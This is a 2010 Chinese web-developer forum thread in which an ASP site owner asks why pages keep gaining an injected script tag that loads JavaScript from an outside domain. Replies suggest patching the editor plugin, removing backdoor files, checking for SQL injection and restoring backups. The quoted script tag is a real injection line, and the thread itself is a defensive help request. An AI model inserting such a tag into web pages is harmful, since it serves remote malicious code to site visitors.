求教网站页面被修改

dkyong 2010-05-06 08:27:12
我的网站是ASP的,最近好多页面都被改写,页面里都多了<script language="javascript" src="http://12f.officea.ze.tc/office.js?google_ad_format=728x90_as"></script>,改了好多次,查毒都查不到什么,把页面改成只读情况也一样,请问该怎么处理呢?请大家帮帮忙,谢谢!
...全文
135 11 打赏 收藏 转发到动态 举报
写回复
用AI写文章
11 条回复
切换为时间正序
请发表友善的回复…
发表回复
dkyong 2010-05-08
  • 打赏
  • 举报
回复
租用的空间,什么事情都干不了,谢谢大家帮忙!
_老吴 2010-05-07
  • 打赏
  • 举报
回复
我遇到过这种情况的,大多数是因为第三方插件的漏洞所制!我用的是ewebeditor,找个修补好的,然后清楚里面的危险文件,以前里面的上传图片文件夹里有后门文件好象是asa的后缀,现在的好象还有别的文件,反正不是网页文件你就删!
如果是数据库被注入则加些代码即可!网上多的是这样的代码,搜一下就可以了
lbcleo 2010-05-07
  • 打赏
  • 举报
回复
查看下你的数据库内容,有没有多东西
克力 2010-05-07
  • 打赏
  • 举报
回复
晕,,,,那要怎么才能解决??有人能把方法说下吗?
litengfei0020 2010-05-07
  • 打赏
  • 举报
回复
估计是被黑了把 用备份覆盖吧
xlj_2008 2010-05-07
  • 打赏
  • 举报
回复
网站源码撤掉,重新发布好用的,然后把服务器的安全设置好(防火墙、杀软、端口)
dkyong 2010-05-07
  • 打赏
  • 举报
回复
没人遇到这种情况吗?
不耐烦 2010-05-07
  • 打赏
  • 举报
回复
是不是arp造成的呢~安装个arp 防火墙试试
dkyong 2010-05-07
  • 打赏
  • 举报
回复
我查过数据库,没有发现可疑的记录,空间是租用的,据说是服务器不可能中木马(暂时无法验证,但怀疑),我把有被改写的修改好再上传,没多久就又被改掉,再不行直接改成静态的算啦,真是晕死......
dkyong 2010-05-06
  • 打赏
  • 举报
回复
大家有没有遇到这种情况呢?请说说解决方法吧.
dkyong 2010-05-06
  • 打赏
  • 举报
回复
网址:http://www.nhufida.com.cn

28,391

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧